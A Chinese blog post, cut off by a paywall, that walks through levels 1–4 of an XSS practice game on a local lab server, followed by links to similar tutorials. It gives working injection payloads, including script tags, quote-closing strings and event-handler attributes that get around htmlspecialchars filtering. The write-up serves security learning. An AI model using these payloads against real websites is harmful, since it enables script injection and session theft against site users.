XSS通关小游戏以及我的挑战思路分享(XSS绕过代码)

最新推荐文章于 2024-05-24 12:16:49 发布
最新推荐文章于 2024-05-24 12:16:49 发布
阅读量2.2k 收藏 5
点赞数 3
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42133828/article/details/83039939
版权
本文详细介绍了XSS通关游戏的各个关卡,包括level1到level20的解决思路和payload。从简单的URL修改到复杂的编码与事件注入,揭示了XSS攻击的各种常见手法和防御措施的绕过技巧。通过本文,读者可以深入理解XSS漏洞的本质和防范策略。
摘要由CSDN通过智能技术生成

level1

这一关是一个很简单的测试,直接在url上改一下标签就行了。

payload如下:

127.0.0.1/XSS/level1.php?name=<script>alert(1)</script>

level2

这一关是一个比较典型的搜索框XSS,只需要构造一下闭合语句,将input语句<input name=keyword value="123">闭合。

这个可以有很多方法,但主要的还是闭合 "> 。

payload如下:

"><script>alert(1)<script>
"><svg/onload=alert(1)>
"><img src=1 onerror="alert(1)"
"><a href="javascript:alert(1)">123</a>

level3

这一关注入<>和',发现都被反射出来了,再看一下源代码,第三关的两个地方都加了htmlspecialchars函数处理,但是htmlspecialchars默认配置是不过滤单引号的。只有设置了:quotestyle,才可以。那么就用单引号来测试

payload如下

'onclick='alert(1)
'onmouseover='alert(1)'

构造闭合语句:<input name=keyword value='".htmlspecialchars('onclick='alert(1))."'>

level4

这一关同上一关很是相似,但查看网页源码时会发现,这里的input是双引号的

<input name=keyword  value="try harder!">

所以输入的语句也需要改一下,payload如下:

"onclick="alert(1)
"onmouseover='alert(1)'

构造闭合语句:<input name=keyword value="'.htmlspecialchars("onclick="alert(1)).'&

最低0.47元/天 解锁文章
南人旧心1906
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs 通关教程
SkyWT 的博客
07-05 1696
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
XSSlabs通关手册
04-25
注入的代码是`' onclick='javascript:alert(1)'//`,这种方法成功绕过了转义过滤。 Level 4,攻击者注意到双引号被用于字符串的包围,因此将payload中的单引号改为双引号,即`"><script>alert(1)</script>"`,成功...
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
热门推荐
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
xss-labs(1~16)通关超详解
最新发布
2301_80031208的博客
05-24 1270
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
XSS靶场通关
ANYOUZHEN的博客
05-20 1792
leve1 反射型xss,将name后面的值test改为 <script>alert('xss')</script> level2 查看后端代码 得先将前面闭合 ,并且用//将后面的代码注释掉 左边的">去闭合原先的",右边的//去注释原先的"> "><script>alert('xss')</script>// level3 输入test进行尝试,发现没有成功,观察后端代码 猜测服务器端在这两处都用
xss挑战通关笔记
ranuy阮的博客
03-17 497
xss小游戏通关笔记levle1level2level3level4level5level6level7level8level9level10level11level12level13level14level15level16level17level18 levle1 在url中输入tt,页面输出tt 在url中构造这段js代码 <script>alert(1)</script...
XSS通关实战
m0_55563900的博客
03-10 341
XSS基础 跨站脚本(Cross -Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能层到很高的权限(如执行一些操作)、 私密网页内容、 会话和cookie等各种内容。 XSS攻击可以分为三种:反射型、存储型和DOM型。 反射型 反射型XSS又称非持久型XSS,这种攻击方式往往具有一次性。、 攻击方式:攻击者通过电子邮件等方式将包
第五期月刊—进击的XSS.pdf
08-08
基础知识 新手指南:DVWA-1.9 全级别教程(完结篇,附实例)之 XSS ...XSS通关小游戏以及我的挑战思路分享 WEB 安全系列之如何挖掘 XSS 漏洞 XSS绕过之前端绕过 实战进阶 某学习直播平台的 xss 绕过 总结了下自己的 XS
XSS通关笔记
龙卷风摧毁停车场
10-09 567
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
XSS靶机通关以及XSS介绍
S_cx666的博客
08-01 644
XSS靶机通关
DVWA XSS (Stored) 通关教程
weixin_30703911的博客
08-20 1217
Stored Cross Site Scripting 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。 Low Security Level DVWA XSS (Stored) 通关教程 W...
xss源码小游戏.rar
07-09
xss代码小游戏,你值得拥有,简单粗暴,带你学会xss,非常适合初学者.
xss游戏平台源码
12-12
xss游戏平台源码
DVWA靶场之XSS通关详解
qq_62169455的博客
06-27 1319
里面的任意字母改为大写即可),此处也可以通过双写(即写两个嵌套的script)来绕过,即在输入框里面输入代码: alert("GXY")
xss1-20通关
weixin_62420492的博客
01-24 1097
level 1 观察三处箭头,发现是向服务器提交了一个name 参数,值为"test",从页面回显看,将name参数的值显示在了页面上,并且显示了name参数值的字符长度 查看其源码 将name 参数重新赋值为 <script>alert('xss')</script> ...
xss-labs靶场通关
m0_70349048的博客
02-27 1257
我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞然后直接进行测试,在name后面加入xss攻击语句。
Xss小游戏通关秘籍
蚁景网安学院
11-26 897
本文作者:kale 本文首发于“合天智汇”公众号,转载请联系公众号! 一、 题记 最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例! 二、 知识前导 什么是XSSXSS 或者说跨站脚本是一种 Web 应用程序的漏洞,当来自用户的不可信数据被应用程序在没有验证以及反射回浏览器而没有进行编码或转义的情况下进行...
Xss小游戏通关攻略带解释
sirius的博客
08-28 5475
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 1694
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值